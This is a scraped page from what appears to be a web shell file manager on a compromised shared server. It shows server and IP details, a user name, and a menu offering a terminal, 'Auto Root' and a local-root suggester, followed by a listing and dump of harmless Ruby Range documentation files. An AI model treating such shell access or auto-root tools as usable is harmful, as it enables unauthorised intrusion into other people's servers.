Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.103
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ri /
system /
Range /
Delete
Unzip
Name
Size
Permission
Date
Action
%25-i.ri
1.09
KB
-rw-r--r--
2026-04-07 17:22
%3d%3d%3d-i.ri
1.14
KB
-rw-r--r--
2026-04-07 17:22
%3d%3d-i.ri
1.25
KB
-rw-r--r--
2026-04-07 17:22
as_json-i.ri
1.09
KB
-rw-r--r--
2026-04-07 17:22
begin-i.ri
508
B
-rw-r--r--
2026-04-07 17:22
bsearch-i.ri
445
B
-rw-r--r--
2026-04-07 17:22
cdesc-Range.ri
10.55
KB
-rw-r--r--
2026-04-07 17:22
count-i.ri
1.24
KB
-rw-r--r--
2026-04-07 17:22
cover%3f-i.ri
4.44
KB
-rw-r--r--
2026-04-07 17:22
each-i.ri
698
B
-rw-r--r--
2026-04-07 17:22
end-i.ri
521
B
-rw-r--r--
2026-04-07 17:22
entries-i.ri
581
B
-rw-r--r--
2026-04-07 17:22
eql%3f-i.ri
1.27
KB
-rw-r--r--
2026-04-07 17:22
exclude_end%3f-i.ri
648
B
-rw-r--r--
2026-04-07 17:22
first-i.ri
848
B
-rw-r--r--
2026-04-07 17:22
hash-i.ri
500
B
-rw-r--r--
2026-04-07 17:22
include%3f-i.ri
1.15
KB
-rw-r--r--
2026-04-07 17:22
inspect-i.ri
797
B
-rw-r--r--
2026-04-07 17:22
json_create-c.ri
310
B
-rw-r--r--
2026-04-07 17:22
last-i.ri
1.23
KB
-rw-r--r--
2026-04-07 17:22
max-i.ri
3
KB
-rw-r--r--
2026-04-07 17:22
member%3f-i.ri
1.18
KB
-rw-r--r--
2026-04-07 17:22
min-i.ri
3
KB
-rw-r--r--
2026-04-07 17:22
minmax-i.ri
1.99
KB
-rw-r--r--
2026-04-07 17:22
new-c.ri
819
B
-rw-r--r--
2026-04-07 17:22
overlap%3f-i.ri
2.71
KB
-rw-r--r--
2026-04-07 17:22
reverse_each-i.ri
786
B
-rw-r--r--
2026-04-07 17:22
size-i.ri
663
B
-rw-r--r--
2026-04-07 17:22
step-i.ri
1.52
KB
-rw-r--r--
2026-04-07 17:22
to_a-i.ri
598
B
-rw-r--r--
2026-04-07 17:22
to_json-i.ri
689
B
-rw-r--r--
2026-04-07 17:22
to_s-i.ri
773
B
-rw-r--r--
2026-04-07 17:22
Save
Rename
U:RDoc::AnyMethod[iI" count:ETI"Range#count;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"VReturns the count of elements, based on an argument or block criterion, if given.;To:RDoc::Markup::BlankLine o; ; [I"IWith no argument and no block given, returns the number of elements:;T@o:RDoc::Markup::Verbatim; [I"(1..4).count # => 4 ;TI"(1...4).count # => 3 ;TI"('a'..'d').count # => 4 ;TI"('a'...'d').count # => 3 ;TI"%(1..).count # => Infinity ;TI"%(..4).count # => Infinity ;T:@format0o; ; [I"MWith argument +object+, returns the number of +object+ found in +self+, ;TI"'which will usually be zero or one:;T@o;; [I"(1..4).count(2) # => 1 ;TI"(1..4).count(5) # => 0 ;TI"(1..4).count('a') # => 0 ;T; 0o; ; [I"<With a block given, calls the block with each element; ;TI"Oreturns the number of elements for which the block returns a truthy value:;T@o;; [I"2(1..4).count {|element| element < 3 } # => 2 ;T; 0o; ; [I"Related: Range#size.;T: @fileI"range.c;T:0@omit_headings_from_table_of_contents_below0I"Qcount -> integer count(object) -> integer count {|element| ... } -> integer ;T0[ I"(*args);T@-FI" Range;TcRDoc::NormalClass00